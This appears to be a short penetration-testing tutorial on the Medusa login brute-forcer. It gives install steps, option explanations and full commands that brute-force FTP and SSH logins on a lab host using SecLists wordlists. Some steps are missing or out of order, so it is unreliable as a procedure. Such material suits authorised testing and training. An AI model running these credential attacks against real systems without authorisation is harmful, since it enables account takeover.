🚔Medusa

Medusa is a modular, speedy, and parallel, login brute-forcer.

Medusa is a modular, speedy, and parallel, login brute-forcer. It is a very powerful and lightweight tool. Medusa tool is used to brute-force credentials in as many protocols as possible which eventually lead to remote code execution. It currently has over 21 modules, some of which are: PcAnywhere, POP3, CVS, FTP, HTTP, IMAP, SMB, SMTP (VRFY), SNMP, SSHv2, MS-SQL, MySQL, NCP (NetWare), PostgreSQL, rexec, rlogin, rsh, Telnet, SVN, VNC, VmAuthd and a generic wrapper module. Kali Linux comes with pre-installed Medusa. If you don’t have the Medusa tool installed in your system. Simply, run the following command on your terminal consisting of the apt package manager to install the Medusa tool.

Multiple protocols supported. Many services are currently supported (e.g. SMB, HTTP, POP3, MS-SQL, SSHv2, among others)

In Kali Linux Machine -> Open Terminal Window and type below command to install the medusa tool.

sudo apt-get install medusa

Step 1: To run medusa in your system simply type medusa in the terminal.

Step 2: If you need help regarding Medusa Tool. Simply, type medusa -h in the terminal.

use -d option to dump all the available modules.

Step 3: To avoid ssh connection error first check the SSH Services and if its not started use the below command to start the ssh services.

Run Nmap to target machine to check the open ports and services,version

Step 5: To install the seclists to use bruteforce attack.

you can view the seclists using below command

Step 4: To crack the Password for SSH and FTP service, type the below command - Password Cracking Using seclists Username and password

Type the below command for FTP Password Crack

medusa -h 10.10.1.3 -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/500-worst-passwords.txt -M ftp -n 21

-h - Specify the host

-U - Specify the Username file location

-u - Specify the Username

-P - Specify the password file location

-p - specify the password

-M - Specify the service type

-n - Specify the port number

Type the below command for SSH Password Crack

medusa -h 10.10.1.3 -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/500-worst-passwords.txt -M ssh -n 22

medusa -h 10.10.1.3 -U /home/protector/Downloads/username.txt -P /home/protector/Downloads/userpass.txt -M ssh -n 22